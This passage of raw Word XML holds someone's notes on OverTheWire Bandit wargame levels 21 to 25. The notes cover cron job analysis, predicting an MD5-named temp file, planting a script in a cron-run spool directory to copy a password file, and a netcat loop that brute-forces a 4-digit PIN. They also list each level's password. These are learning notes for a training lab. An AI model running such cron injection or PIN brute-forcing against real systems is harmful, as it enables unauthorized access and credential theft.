      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC4813">
        <w:t>cron.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC4813">
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEE40F5" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- `cat /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/cronjob_bandit22`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353EBFFC" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- `cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tempfilename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4357FD3D" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="219AED12" w14:textId="6726CF05" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F859232" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">1. Examined </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> job configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52466D04" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Found script that writes password to temporary file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D11F05" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Read the password from temp file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA00A96" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="25C2FB6E" w14:textId="0B2902E9" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443463C2" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E3D72E" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: tRae0UfB9v0UzbCdn9cY0gQnds9GF58Q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C2C10C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="1574D230" w14:textId="15C62031" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Learning: Understand </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> jobs and how scheduled tasks can expose information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB03356" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65D4BF81" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="549C8C26" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="14B97223" w14:textId="4DFD8724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22 → Level 23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295C6482" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="5888A71E" w14:textId="2D74E353" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Tools Used: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> analysis, md5sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D800637" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="037B1711" w14:textId="08D2D8C8" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Predict filename generated by script using username.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2430ABAA" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7A364CFB" w14:textId="11375A55" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Commands Used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14806FDF" w14:textId="624976B7" w:rsidR="00EC4813" w:rsidRDefault="00EC4813" w:rsidP="00B305D3">
      <w:r>
        <w:t>- `</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4813">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4813">
        <w:t>ls -l /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC4813">
        <w:t>cron.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC4813">
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677F51B7" w14:textId="322C760F" w:rsidR="00EC4813" w:rsidRDefault="00EC4813" w:rsidP="00B305D3">
      <w:r>
        <w:t>- `</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4813">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4813">
        <w:t>cat /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC4813">
        <w:t>cron.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC4813">
        <w:t>/cronjob_bandit23</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10342A2E" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- `cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin/cronjob_bandit23.sh`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C42D6E4" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- `echo I am user bandit23 | md5sum | cut -d ' ' -f 1`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704D982C" w14:textId="6F2F4AF4" w:rsidR="00EC4813" w:rsidRDefault="00EC4813" w:rsidP="00B305D3">
      <w:r>
        <w:t>- `</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4813">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4813">
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC4813">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC4813">
        <w:t>/&lt;generated md5hash&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3ABACC" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="471D195F" w14:textId="43D3F83A" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426335B1" w14:textId="1FC46EAC" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="0034564F">
        <w:t>Analysed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> script that generates filename from username hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730F9B84" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Computed MD5 hash for "I am user bandit23"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CE1D73" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Read password from predicted filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564CA06A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="54B2E1F7" w14:textId="6DB982A8" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D93AA4D" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F9498D" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: 0Zf11ioIjMVN551jX3CmStKLYqjk54Ga</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A87908B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="3DC11B08" w14:textId="3A4F110C" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Reverse engineer script logic to predict filenames and understand hashing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3436E988" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D418D5" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="2E07B5DF" w14:textId="77777777" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3"/>
    <w:p w14:paraId="464034B8" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="283363A4" w14:textId="12365768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23 → Level 24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56825A87" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="61D7BF9D" w14:textId="71E011D8" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Tools Used: script creation, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDECA52" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7A046EEC" w14:textId="37A63E8C" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Objective: Create script that will be executed by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> job.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17204A59" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="4CD1007D" w14:textId="2A368236" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EE86A4" w14:textId="2CD08721" w:rsidR="00EC4813" w:rsidRDefault="00EC4813" w:rsidP="00EC4813">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>ls -l /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B02694" w14:textId="4D4ABB57" w:rsidR="00EC4813" w:rsidRDefault="00EC4813" w:rsidP="00EC4813">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>cat /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/cronjob_bandit24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C4F646" w14:textId="3CFFDD66" w:rsidR="00EC4813" w:rsidRDefault="00EC4813" w:rsidP="00EC4813">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>cat /usr/bin/cronjob_bandit24.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A28B4AB" w14:textId="08FB61F1" w:rsidR="00EC4813" w:rsidRDefault="00EC4813" w:rsidP="00EC4813">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>echo '#!/bin/bash' &gt; getpass.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A7EAC6" w14:textId="56DCCBF6" w:rsidR="00EC4813" w:rsidRDefault="00EC4813" w:rsidP="00EC4813">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>echo 'cat /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bandit_pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bandit24 &gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bandit24_pass' &gt;&gt; getpass.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E681EC" w14:textId="6F898770" w:rsidR="00EC4813" w:rsidRDefault="00EC4813" w:rsidP="00EC4813">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> +x getpass.sh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40132C53" w14:textId="0A1DC32F" w:rsidR="00EC4813" w:rsidRDefault="00EC4813" w:rsidP="00EC4813">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>cp getpass.sh /var/spool/bandit24/foo/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548D4D89" w14:textId="32D5A057" w:rsidR="00B305D3" w:rsidRDefault="00EC4813" w:rsidP="00EC4813">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bandit24_pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346F4B2C" w14:textId="77777777" w:rsidR="00EC4813" w:rsidRDefault="00EC4813" w:rsidP="00B305D3"/>
    <w:p w14:paraId="4BE469D2" w14:textId="7FF350CA" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BC6A18" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Created script to dump password to accessible location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3ED52A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">2. Placed script in directory monitored by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548479CF" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Waited for execution and read password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7941D3F6" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="6D6D756E" w14:textId="67E66E52" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3F00EA" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B12BF89" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794AE340" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="48FD1173" w14:textId="78F34999" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Learning: Exploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> job execution to run custom scripts and extract information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9344B7" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38C76B2C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="423815DE" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="36B44589" w14:textId="77777777" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3"/>
    <w:p w14:paraId="6E20339F" w14:textId="77777777" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3"/>
    <w:p w14:paraId="34F0F43A" w14:textId="77777777" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7CABBE5C" w14:textId="49C3F6C4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24 → Level 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B2D205" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="5E2FFABB" w14:textId="567AA456" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Tools Used: brute force scripting, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71B2CDDE" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7390BA1A" w14:textId="1385BC6A" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Objective: Find 4-digit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pincode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by brute force attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12406C69" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="4C8BC073" w14:textId="09005562" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Commands Used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713683BC" w14:textId="0D0663CA" w:rsidR="00EC4813" w:rsidRDefault="00EC4813" w:rsidP="00EC4813">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>password=$(cat /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bandit_pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bandit24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5368A707" w14:textId="17F7E4DB" w:rsidR="00EC4813" w:rsidRDefault="00EC4813" w:rsidP="00EC4813">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>seq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -w 0 9999); do echo "$password $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q1 localhost 30002; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B66449" w14:textId="77777777" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00EC4813"/>
    <w:p w14:paraId="0F34759A" w14:textId="77777777" w:rsidR="00B45AFD" w:rsidRDefault="00EC4813" w:rsidP="00EC4813">
      <w:r>
        <w:t xml:space="preserve">result obtained: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DC8863" w14:textId="62FB6D13" w:rsidR="00EC4813" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00EC4813">
        <w:t xml:space="preserve">I am the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EC4813">
        <w:t>pincode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EC4813">
        <w:t xml:space="preserve"> checker for user bandit25. Please enter the password for user bandit24 and the secret </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EC4813">
        <w:t>pincode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EC4813">
        <w:t xml:space="preserve"> on a single line, separated by a space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57693DCB" w14:textId="419502C6" w:rsidR="00EC4813" w:rsidRDefault="00B45AFD" w:rsidP="00EC4813">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00EC4813">
        <w:t>Correct!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744AAD51" w14:textId="13AD6E99" w:rsidR="00B305D3" w:rsidRDefault="00B45AFD" w:rsidP="00EC4813">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00EC4813">
        <w:t>The password of user bandit25 is iCi86ttT4KSNe1armKiwbQNmB3YJP3q4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5272B329" w14:textId="77777777" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00EC4813"/>
    <w:p w14:paraId="6FE7E612" w14:textId="3FE962BD" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E72453D" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Created loop to try all 4-digit combinations (0000-9999)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D70302" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">2. Used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to submit password and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pincode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> combinations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039B595E" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Found correct combination and received password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C02584" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="5B6C25E6" w14:textId="3026634F" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF6C697" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2D671F" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: iCi86ttT4KSNe1armKiwbQNmB3YJP3q4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D9E90E" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
